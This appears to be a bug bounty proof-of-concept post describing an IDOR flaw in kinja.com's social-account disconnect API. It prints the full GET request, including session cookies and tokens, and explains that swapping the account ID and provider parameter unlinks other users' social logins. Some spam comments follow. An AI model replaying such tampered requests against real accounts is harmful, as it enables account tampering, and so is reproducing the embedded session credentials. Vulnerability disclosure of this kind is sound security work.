KINJA.COM IDOR BUG WORTH 1000$
[ads]
Kinja IDOR Poc – Bug Bounty POC
Hi my name is Rui Silva and i found a IDOR vulnerability on Kinja.com
Steps to reproduce:
First this vulnerability only works if your account was login via Connect to Facebook Button
This is a GET Request for disconnect any social media from your account looks like this:
GET /api/profile/account/<account_id>/disconnect?provider=google&token=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a&jsonp=jQuery211027393518528777927_1437691862794 HTTP/1.1
Host: kinja.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://kinja.com/settings
Cookie: ka=85c343a0-aec6-43ce-804f-5b1778512994|5334a9b2-808b-4648-9137-b143feea3d26|1437690908546; __k_iut=1436869611979; _cb_ls=1; _chartbeat2=CgfSMpl8BpelgLqd.1436869612907.1437691865015.1000000001; _ga=GA1.2.2138116728.1436869499; __qca=P0-673955367-1436869613038; cto_gawk=; fbm_36368793975=base_domain=.kinja.com; pageDepth=5; KinjaSession=228086f8-1572-4f89-9f67-b7c7215e15e6; fbsr_36368793975=NSp9fPMWHKe-4VcmDjw-kz2s2OeO9t-CCQIGPI8Jg2g.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUJDX1ZyOUZibEZMY3d2cGd0TVliSVVQWEYwRUdIY0dYdjdzMXBOLUVGZG54MmRqQjVEd3ctbmdSQl9TSy1HTUFFY0hLTG1va21Ub2R4OWZtVHJzTnFRUDU4TnpHekM3SzdvQW1kU1MwSjR2UUZNWTkwSmo3ZHJXVTNHVmlzZWRXNmMzQXZhQlNqY2oxVUxONXZqS3lPNVd2UVcycnVTX3VmVFZoYm1SdVU5MXd6NFM1VHBRemwxOWZlN1F3cHdhY2d6aEd5ejI2aHpaSnVRbGF3ZlM4OWo3ZW5UclFiNE9rY3YzbUNPd1hwem9tWXRKZ2hlZjN6Y29NZ05PRDJQY0o4WndvTTZGVDdWZ0VZaG8wZnBnTG0tcmVfWG03VEpsbkdrYVBzdTBEQVhXMlBwTTk0RE0tUU9jOFlWQ3h2anE0bXNQbUNwZld3bThGQmZERUN3RG9xLSIsImlzc3VlZF9hdCI6MTQzNzY4OTE0NCwidXNlcl9pZCI6IjE2MTg0MjUwNjUxMTI1MTIifQ; geocc=PT; KinjaRememberMe=5876237249235904615|228086f8-1572-4f89-9f67-b7c7215e15e6; kinjaads.displayName=Silva; kinjaads.isBurner=false; _gat=1; KinjaToken=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a
Connection: keep-alive
It was observed that by simply changing the value of <account_id> in the above URL. You can disconnect any of social media of victim accounts.
If account was login with facebook i can disconnect victim from twitter and google
If account was login with twitter i can disconnect victim from facebook and google
If account was login with google i can disconnect victim from twitter and facebook
All you have to do is change victim id on request above and on provider= parameter change it for any social network you are connected
Thanks
IMPACT:
I can disconnect any account who was login via Connect to Facebook Function
Thanks
I think this web site contains some rattling wonderful info for everyone :D. “Time–our youth–it never really goes, does it It is all held in our minds.” by Helen Hoover Santmyer.
But could u guesss the victim id?